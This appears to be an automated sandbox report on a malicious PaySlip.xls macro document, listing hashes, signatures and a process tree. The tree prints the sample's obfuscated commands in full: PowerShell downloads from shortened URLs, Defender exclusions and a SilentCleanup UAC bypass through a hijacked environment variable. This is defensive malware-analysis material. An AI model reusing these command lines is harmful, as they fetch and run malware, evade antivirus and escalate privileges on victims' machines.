Analysis

  • max time kernel
    136s
  • max time network
    132s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-01-2021 07:37

General

  • Target

    PaySlip.xls

  • Size

    157KB

  • MD5

    3202c4586c4991c9f5312238f7577d8e

  • SHA1

    10291ff94dbce8eda7aa9ede69bf984a084b8b9e

  • SHA256

    3f97ea67ea560c851c589e4b7161f60ece5c390a9e194818b30987b212434c06

  • SHA512

    ebe2a28ac003935a61b9795b39aa34324d275aed8340263d9566b6068cbe813e979f28b6243d9115bbd2d23988a161129675aaa33281b855399b15ffb4aa1691

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/fjYtydH

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PaySlip.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3200
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w 1 ./a.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:416
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\a.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ver
          4⤵
            PID:1260
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "C:\tmp" ;Add-MpPreference -ExclusionPath "${EN`V`:APPdAta}" ;sTAR`T-sl`EeP 12;(nEw-oBje`cT Net.WebcL`IENt).('Down'+'load'+'Fi'+'le').InVoke('https://rebrand.ly/g8zrqvw',(${EN`V`:Appdata})+'\ok.exe');sTAR`T-sl`EeP 2; sTAR`T-pr`OCeSs ${EN`V`:Appdata}\ok.exe;
            4⤵
              PID:1276
            • C:\Windows\system32\timeout.exe
              timeout /t 2
              4⤵
              • Delays execution with timeout.exe
              PID:1412
            • C:\Windows\system32\schtasks.exe
              schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
              4⤵
                PID:1780
              • C:\Windows\system32\reg.exe
                reg delete "HKCU\Environment" /v "windir" /F
                4⤵
                  PID:1796

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Discovery

          Query Registry

          2
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            MD5

            d737fc27bbf2f3bd19d1706af83dbe3f

            SHA1

            212d219394124968b50769c371121a577d973985

            SHA256

            b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

            SHA512

            974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            301f063ad8ef9768498205915a60cabd

            SHA1

            1b6b8402bd0c366a5a5554d86b9cdf82801a2d75

            SHA256

            8b9127dd3d256d85f31eaee48353b23522ab17c01329061a20ed51f857c5dc78

            SHA512

            41eafc53398f2ebbf42de9657c7aa81bed493c0b7a0280df20e6b2183f4deb2a225c826cddebe9f38c191c7fc7473253ae8807cc3a1144a2af4ac5b0d135ea18

          • C:\Users\Admin\Documents\a.bat
            MD5

            965010cb341dbea5a9d3ed6fca91740a

            SHA1

            3744f2b72dd21413565acc5e13ca5c82e1962fc6

            SHA256

            086a9ec8f6e4d536329e899ac34204e6f364dc496c4b1ddf1b5e964d342b915b

            SHA512

            99a55fbd54dc9f3479c70051d9839f1c04ec9b738ba7c29cecb36af8fa1203edf58bd8194044c4f68da3172dafc710a8ab8649cc6987fbdba018b211c0379519

          • C:\Users\Admin\Documents\a.bat
            MD5

            965010cb341dbea5a9d3ed6fca91740a

            SHA1

            3744f2b72dd21413565acc5e13ca5c82e1962fc6

            SHA256

            086a9ec8f6e4d536329e899ac34204e6f364dc496c4b1ddf1b5e964d342b915b

            SHA512

            99a55fbd54dc9f3479c70051d9839f1c04ec9b738ba7c29cecb36af8fa1203edf58bd8194044c4f68da3172dafc710a8ab8649cc6987fbdba018b211c0379519

          • memory/416-31-0x000001F5798D6000-0x000001F5798D8000-memory.dmp
            Filesize

            8KB

          • memory/416-28-0x000001F5798D3000-0x000001F5798D5000-memory.dmp
            Filesize

            8KB

          • memory/416-27-0x000001F5798D0000-0x000001F5798D2000-memory.dmp
            Filesize

            8KB

          • memory/416-18-0x00007FF85AB20000-0x00007FF85B50C000-memory.dmp
            Filesize

            9.9MB

          • memory/416-16-0x0000000000000000-mapping.dmp
          • memory/1084-22-0x0000000000000000-mapping.dmp
          • memory/1260-24-0x0000000000000000-mapping.dmp
          • memory/1276-25-0x0000000000000000-mapping.dmp
          • memory/1412-26-0x0000000000000000-mapping.dmp
          • memory/1780-29-0x0000000000000000-mapping.dmp
          • memory/1796-30-0x0000000000000000-mapping.dmp
          • memory/3200-7-0x0000000000000000-mapping.dmp
          • memory/4020-13-0x0000018A7F960000-0x0000018A7F961000-memory.dmp
            Filesize

            4KB

          • memory/4020-12-0x0000018A7F6D3000-0x0000018A7F6D5000-memory.dmp
            Filesize

            8KB

          • memory/4020-11-0x0000018A7F6D0000-0x0000018A7F6D2000-memory.dmp
            Filesize

            8KB

          • memory/4020-10-0x0000018A7F5D0000-0x0000018A7F5D1000-memory.dmp
            Filesize

            4KB

          • memory/4020-9-0x00007FF85AB20000-0x00007FF85B50C000-memory.dmp
            Filesize

            9.9MB

          • memory/4020-8-0x0000000000000000-mapping.dmp
          • memory/4020-14-0x0000018A7F6D6000-0x0000018A7F6D8000-memory.dmp
            Filesize

            8KB

          • memory/4716-6-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp
            Filesize

            64KB

          • memory/4716-4-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp
            Filesize

            64KB

          • memory/4716-5-0x00007FF8640E0000-0x00007FF864717000-memory.dmp
            Filesize

            6.2MB

          • memory/4716-2-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp
            Filesize

            64KB

          • memory/4716-3-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp
            Filesize

            64KB